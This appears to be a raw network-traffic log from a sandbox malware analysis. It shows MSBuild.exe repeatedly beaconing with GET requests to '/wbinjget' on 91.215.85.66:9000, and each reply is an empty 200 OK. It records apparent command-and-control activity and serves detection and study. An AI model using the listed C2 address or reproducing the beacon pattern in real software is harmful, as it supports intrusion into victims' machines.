Apr 25, 2024 12:16:57.082665920 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49771	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:57.431854963 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:16:58.211308956 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:58 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49772	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:58.568259954 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:00.083529949 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:59 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49774	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:00.444346905 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:01.228018045 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49775	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:01.592042923 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:02.348109007 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:02 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49776	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:02.701188087 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:03.524398088 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:03 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49777	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:03.881304979 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:04.644094944 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:04 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49778	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:05.002417088 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:05.569243908 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:04 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49779	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:05.937685966 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:06.231520891 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:05 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49780	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:06.589467049 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:06.849131107 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:06 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49781	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:07.420002937 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:07.825983047 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:06 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49782	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:08.176585913 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:08.746114969 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:07 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49783	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:09.108521938 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:09.386081934 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:08 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49784	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:09.744756937 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:10.014539003 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:08 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49785	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:10.365232944 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:10.653599024 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:10 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49786	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:11.009099960 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:11.291349888 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:11 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49787	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:11.646040916 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:11.926868916 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:11 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49788	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:12.288191080 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:12.534455061 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:12 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49789	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:12.894553900 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:13.156600952 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:12 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49790	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:13.521452904 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:14.313272953 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:13 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49791	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:14.661263943 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:15.273257971 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:15 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49792	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:15.644793034 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:16.054502010 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:15 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49793	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:16.420329094 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:16.930778980 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:16 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49794	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:17.292013884 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:17.581003904 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:17 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49795	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:17.930171013 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:18.173990011 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:17 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49796	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:18.520539045 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:18.763547897 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:18 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49797	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:19.110337019 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:19.356659889 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:18 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49798	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:19.717912912 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:19.957772970 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:19 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49799	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:20.310158014 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:20.552882910 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:20 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49800	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:20.899264097 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:21.142944098 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:20 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49801	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:21.490103960 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:21.752825975 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:21 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49802	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:22.114759922 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:22.361118078 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:21 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49803	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:22.724087000 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:22.972706079 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:22 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49804	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:23.332067966 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:23.575712919 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:22 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49805	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:24.793258905 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:25.036375046 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:24 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49806	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:25.387197971 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:25.630290031 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:24 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
